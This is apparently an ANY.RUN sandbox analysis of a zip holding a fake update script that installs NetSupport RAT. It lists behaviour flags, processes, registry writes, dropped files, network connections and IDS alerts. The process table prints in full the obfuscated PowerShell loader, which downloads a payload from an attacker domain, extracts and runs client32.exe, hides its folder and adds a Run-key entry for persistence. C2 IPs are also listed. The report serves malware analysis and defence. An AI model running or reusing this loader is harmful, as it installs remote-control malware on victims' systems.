| File name: | MDE_File_Sample_d10ad13321fd608d96979e9ef3b028eb8004d8e3.zip |
| Full analysis: | https://app.any.run/tasks/74ef4cfb-f5c0-4af3-bae3-615c7104e98e |
| Verdict: | Malicious activity |
| Threats: | NetSupport RAT is a malicious adaptation of the legitimate NetSupport Manager, a remote access tool used for IT support, which cybercriminals exploit to gain unauthorized control over systems. It has gained significant traction due to its sophisticated evasion techniques, widespread distribution campaigns, and the challenge it poses to security professionals who must distinguish between legitimate and malicious uses of the underlying software. |
| Analysis date: | May 14, 2024, 21:53:16 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=deflate |
| MD5: | 781BCA08C51BA9B4D1B9AAFD23A79465 |
| SHA1: | 6F898F945CB9BA27FEF50AC4C47FBE2079CE2A76 |
| SHA256: | 07ED8EBCAFC757D5C6122840F42678C0F00B8C0C769A7BD4A9DBAD6859EE7A48 |
| SSDEEP: | 49152:QwnjVvep/MJEcusnkROZ2CITqdCqPYGI3D4wGF35BgesARIzM0FTqdwhB2JLB9z9:9jJepE3kIZhdCEDs0wU35iesAEXkwhgn |
MALICIOUS
Creates internet connection object (SCRIPT)
- wscript.exe (PID: 4032)
Opens an HTTP connection (SCRIPT)
- wscript.exe (PID: 4032)
Unusual connection from system programs
- wscript.exe (PID: 4032)
Sends HTTP request (SCRIPT)
- wscript.exe (PID: 4032)
Bypass execution policy to execute commands
- powershell.exe (PID: 1680)
Changes powershell execution policy (Bypass)
- wscript.exe (PID: 4032)
Connects to the CnC server
- client32.exe (PID: 1660)
Drops the executable file immediately after the start
- powershell.exe (PID: 1680)
NETSUPPORT has been detected (SURICATA)
- client32.exe (PID: 1660)
SUSPICIOUS
The process executes JS scripts
- WinRAR.exe (PID: 3988)
Adds/modifies Windows certificates
- wscript.exe (PID: 4032)
Reads security settings of Internet Explorer
- WinRAR.exe (PID: 3988)
- client32.exe (PID: 1660)
Reads the Internet Settings
- wscript.exe (PID: 4032)
- powershell.exe (PID: 1680)
- client32.exe (PID: 1660)
Contacting a server suspected of hosting an Exploit Kit
- wscript.exe (PID: 4032)
Powershell scripting: start process
- wscript.exe (PID: 4032)
Probably obfuscated PowerShell command line is found
- wscript.exe (PID: 4032)
Probably download files using WebClient
- wscript.exe (PID: 4032)
Runs shell command (SCRIPT)
- wscript.exe (PID: 4032)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 4032)
Unusual connection from system programs
- powershell.exe (PID: 1680)
The Powershell connects to the Internet
- powershell.exe (PID: 1680)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 1680)
Gets path to any of the special folders (POWERSHELL)
- powershell.exe (PID: 1680)
Writes data into a file (POWERSHELL)
- powershell.exe (PID: 1680)
Executable content was dropped or overwritten
- powershell.exe (PID: 1680)
The process drops C-runtime libraries
- powershell.exe (PID: 1680)
Process drops legitimate windows executable
- powershell.exe (PID: 1680)
Extracts files to a directory (POWERSHELL)
- powershell.exe (PID: 1680)
The process bypasses the loading of PowerShell profile settings
- wscript.exe (PID: 4032)
Potential Corporate Privacy Violation
- client32.exe (PID: 1660)
Contacting a server suspected of hosting an CnC
- client32.exe (PID: 1660)
INFO
Checks proxy server information
- wscript.exe (PID: 4032)
- client32.exe (PID: 1660)
Reads the computer name
- wmpnscfg.exe (PID: 116)
- client32.exe (PID: 1660)
Checks supported languages
- wmpnscfg.exe (PID: 116)
- client32.exe (PID: 1660)
Manual execution by a user
- wmpnscfg.exe (PID: 116)
- msedge.exe (PID: 568)
Uses string replace method (POWERSHELL)
- powershell.exe (PID: 1680)
Gets or sets the time when the file was last written to (POWERSHELL)
- powershell.exe (PID: 1680)
The executable file from the user directory is run by the Powershell process
- client32.exe (PID: 1660)
Drop NetSupport executable file
- powershell.exe (PID: 1680)
Reads the machine GUID from the registry
- client32.exe (PID: 1660)
Creates files or folders in the user directory
- client32.exe (PID: 1660)
Application launched itself
- msedge.exe (PID: 568)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0001 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2024:05:14 21:50:02 |
| ZipCRC: | 0x5ea2ad05 |
| ZipCompressedSize: | 1526049 |
| ZipUncompressedSize: | 6725136 |
| ZipFileName: | Update_123.0.6312.111.js |
Total processes
50
Monitored processes
15
Malicious processes
4
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 116 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Network Sharing Service Configuration Application Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 568 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default | C:\Program Files\Microsoft\Edge\Application\msedge.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1128 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2224 --field-trial-handle=1344,i,1018471755629293633,15402133399042776092,131072 /prefetch:1 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1660 | "C:\Users\admin\AppData\Roaming\DIVX23\client32.exe" | C:\Users\admin\AppData\Roaming\DIVX23\client32.exe | powershell.exe | ||||||||||||
User: admin Company: NetSupport Ltd Integrity Level: MEDIUM Description: NetSupport Client Application Version: V12.00 Modules
| |||||||||||||||
| 1680 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $FCcDDxLrGq='https://redsquardhack.com/data.php?6310';$eoXTENOQCydrNVviEnIhWChNQTvOXUHz=(New-Object System.Net.WebClient).DownloadString($FCcDDxLrGq);$lhxQchJQyWKZfIIxaEHHYySzPDsstRqKrt=[System.Convert]::FromBase64String($eoXTENOQCydrNVviEnIhWChNQTvOXUHz);$zxc = Get-Random -Minimum -10 -Maximum 37; $gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY -PathType Container)) { New-Item -Path $gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY -ItemType Directory };$p=Join-Path $gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY 'ah.zip';[System.IO.File]::WriteAllBytes($p,$lhxQchJQyWKZfIIxaEHHYySzPDsstRqKrt);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY -Force; $AZ.attributes='Hidden';$s=$gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 1832 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3924 --field-trial-handle=1344,i,1018471755629293633,15402133399042776092,131072 /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1928 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=109.0.5414.149 "--annotation=exe=C:\Program Files\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win32 "--annotation=prod=Microsoft Edge" --annotation=ver=109.0.1518.115 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd8,0x6db6f598,0x6db6f5a8,0x6db6f5b4 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 2324 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --first-renderer-process --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2216 --field-trial-handle=1344,i,1018471755629293633,15402133399042776092,131072 /prefetch:1 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 2416 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1428 --field-trial-handle=1344,i,1018471755629293633,15402133399042776092,131072 /prefetch:2 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 2456 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1632 --field-trial-handle=1344,i,1018471755629293633,15402133399042776092,131072 /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
Total events
21 183
Read events
20 993
Write events
153
Delete events
37
Modification events
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\MDE_File_Sample_d10ad13321fd608d96979e9ef3b028eb8004d8e3.zip | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
Executable files
47
Suspicious files
340
Text files
66
Unknown types
1
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3988 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb3988.42261\Update_123.0.6312.111.js | — | |
MD5:— | SHA256:— | |||
| 4032 | wscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\update[1].js | — | |
MD5:— | SHA256:— | |||
| 4032 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:C8A6F4C55C95DAE241FB25E4104EC3CD | SHA256:6F47F72CEB7211A57DE489298CF002C5399436F7874A0BABCFB8C9A71EB224AE | |||
| 1680 | powershell.exe | C:\Users\admin\AppData\Roaming\DIVX23\PCICHEK.DLL | executable | |
MD5:104B30FEF04433A2D2FD1D5F99F179FE | SHA256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD | |||
| 1680 | powershell.exe | C:\Users\admin\AppData\Roaming\DIVX23\pcicapi.dll | executable | |
MD5:34DFB87E4200D852D1FB45DC48F93CFC | SHA256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703 | |||
| 1680 | powershell.exe | C:\Users\admin\AppData\Local\Temp\3m2b2lys.piu.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 4032 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | der | |
MD5:822467B728B7A66B081C91795373789A | SHA256:AF2343382B88335EEA72251AD84949E244FF54B6995063E24459A7216E9576B9 | |||
| 4032 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | binary | |
MD5:B962EAC5D5CAF6955F3E2932D6AED8E0 | SHA256:A45100C11485DD5D82832D627AE3E7B5B8D18469A9615833DC7EEA1D99170C5F | |||
| 4032 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\645591AAA95382DE83054171366571D4 | binary | |
MD5:2623B8CEA0C2F1772E533F19F76E332C | SHA256:FE8B80146456EB583CAA25A9486F57C872B5C53C3CDF4A3DD37CC46D8BA85363 | |||
| 1680 | powershell.exe | C:\Users\admin\AppData\Local\Temp\55ifxtvp.2qf.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
43
DNS requests
72
Threats
14
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 304 | 199.232.214.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?d22e69cee3fc1e30 | unknown | — | — | unknown |
4032 | wscript.exe | GET | 200 | 95.100.146.66:80 | http://r3.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgMlsNRuEWX7Mma%2BFnjNb168Hw%3D%3D | unknown | — | — | unknown |
1088 | svchost.exe | GET | 304 | 199.232.214.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?cf3b3ae38045042c | unknown | — | — | unknown |
1660 | client32.exe | POST | — | 5.181.156.36:443 | http://5.181.156.36/fakeurl.htm | unknown | — | — | unknown |
— | — | GET | 200 | 2.19.217.103:80 | http://x1.c.lencr.org/ | unknown | — | — | unknown |
1660 | client32.exe | POST | — | 5.181.156.36:443 | http://5.181.156.36/fakeurl.htm | unknown | — | — | unknown |
1660 | client32.exe | GET | 200 | 104.26.1.231:80 | http://geo.netsupportsoftware.com/location/loca.asp | unknown | — | — | unknown |
1660 | client32.exe | POST | 200 | 5.181.156.36:443 | http://5.181.156.36/fakeurl.htm | unknown | — | — | unknown |
1660 | client32.exe | POST | 200 | 5.181.156.36:443 | http://5.181.156.36/fakeurl.htm | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
4032 | wscript.exe | 45.89.53.17:443 | firstaischool.com | — | UA | unknown |
4032 | wscript.exe | 199.232.214.172:80 | ctldl.windowsupdate.com | FASTLY | US | unknown |
4032 | wscript.exe | 2.19.217.103:80 | x1.c.lencr.org | Akamai International B.V. | NL | unknown |
4032 | wscript.exe | 95.100.146.66:80 | r3.o.lencr.org | Akamai International B.V. | CZ | unknown |
1680 | powershell.exe | 45.89.53.18:443 | redsquardhack.com | — | UA | unknown |
1660 | client32.exe | 104.26.1.231:80 | geo.netsupportsoftware.com | CLOUDFLARENET | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
firstaischool.com |
| unknown |
ctldl.windowsupdate.com |
| whitelisted |
x1.c.lencr.org |
| whitelisted |
r3.o.lencr.org |
| shared |
redsquardhack.com |
| unknown |
geo.netsupportsoftware.com |
| unknown |
ntp.msn.com |
| whitelisted |
config.edge.skype.com |
| whitelisted |
edge.microsoft.com |
| whitelisted |
assets.msn.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
1088 | svchost.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (firstaischool .com) |
4032 | wscript.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT ZPHP Domain in TLS SNI (firstaischool .com) |
1660 | client32.exe | Potential Corporate Privacy Violation | ET POLICY NetSupport GeoLocation Lookup Request |
1660 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
1660 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Checkin |
1660 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Response |
1660 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
1660 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Checkin |
1660 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Response |
1660 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3 ETPRO signatures available at the full report